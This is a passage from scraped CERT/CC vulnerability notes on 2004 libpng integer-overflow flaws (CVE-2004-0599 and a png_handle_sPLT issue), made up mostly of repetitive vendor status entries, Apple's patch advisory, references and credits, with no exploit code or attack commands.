[email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### IBM Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Immunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Microsoft Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Red Hat Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### SCO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Unisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0599](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0599>) \n---|--- \n**Severity Metric:** | 0.97 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-01 21:40 UTC \n**Document Revision: ** | 14 \n", "modified": "2005-06-01T21:40:00", "published": "2004-08-04T00:00:00", "id": "VU:286464", "href": "https://www.kb.cert.org/vuls/id/286464", "type": "cert", "title": "libpng contains integer overflows in progressive display image reading", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:44", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a flaw that could introduce a remotely exploitable vulnerability.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nA potential integer overflow error exists during a memory allocation within the `png_handle_sPLT()` function. While the code that contains this error introduces a dangerous condition, it is unclear what practical vulnerabilities it might present in applications using libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n477512\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: July 16, 2004 Updated: June 01, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. \n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IBM Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Microsoft Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Red Hat Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### ScO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 